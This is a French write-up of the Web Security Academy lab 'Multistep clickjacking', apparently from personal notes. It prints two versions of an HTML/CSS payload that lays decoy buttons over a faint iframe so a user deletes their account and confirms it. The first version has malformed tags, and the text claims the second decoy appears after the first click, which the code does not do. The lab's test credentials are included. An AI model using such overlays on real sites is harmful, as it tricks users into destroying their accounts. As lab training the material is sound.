Clickjacking en plusieurs étapes

Multistep clickjacking

Lab: Multistep clickjacking | Web Security AcademyWebSecAcademy

Objectif : tromper l'utilisateur pour qu'il clique sur le bouton Delete account puis confirme la boîte de dialogue de confirmation en cliquant successivement sur deux leurres : "Click me first" puis "Click me next".

Identifiants fournis pour se connecter au compte (lab) : wiener:peter

La page contient un bouton supprimer le compte suivi d'une boîte de confirmation ("Êtes-vous sûr ?") — il faut donc déclencher deux actions successives.

L'idée est superposer deux zones cliquables (div leurres) au-dessus d'un iframe pointant sur la page /my-account : la première cible le bouton Delete account, la seconde cible le bouton de confirmation qui apparaît ensuite.

On rend l'iframe semi-transparent (ou faible opacité) pour que l'utilisateur voie le leurre mais clique réellement sur les éléments de la page ciblée.

<style>
iframe{
height: 700px;
opacity: 0.1;
}
.first{
position: absolute;
top: 500px;
left: 100px;
}
.next{
position: absolute;
top: 500px;
left: 200px;
}

</style>

<div class="first" Click me first</div>
<div class="next" Click me next</div>
<iframe src="https://0a23007b030f8bc780c8179e00450062.web-security-academy.net/my-account"</iframe>

Le code ci-dessous positionne l'iframe, place deux leurres et fait apparaître le second leurre seulement après clic sur le premier. Le iframe pointe vers l'URL du lab /my-account

<style>
iframe{
height: 700px;
opacity: 0.1;
}
.first{
position: absolute;
top: 500px;
left: 100px;
}
.next{
position: absolute;
top: 310px;
left: 110px;
}

</style>

<div class="first"> Click me first</div>
<div class="next">Click me next</div>
<iframe src="https://0a23007b030f8bc780c8179e00450062.web-security-academy.net/my-account"</iframe>

Mis à jour il y a 1 mois

Ce contenu vous a-t-il été utile ?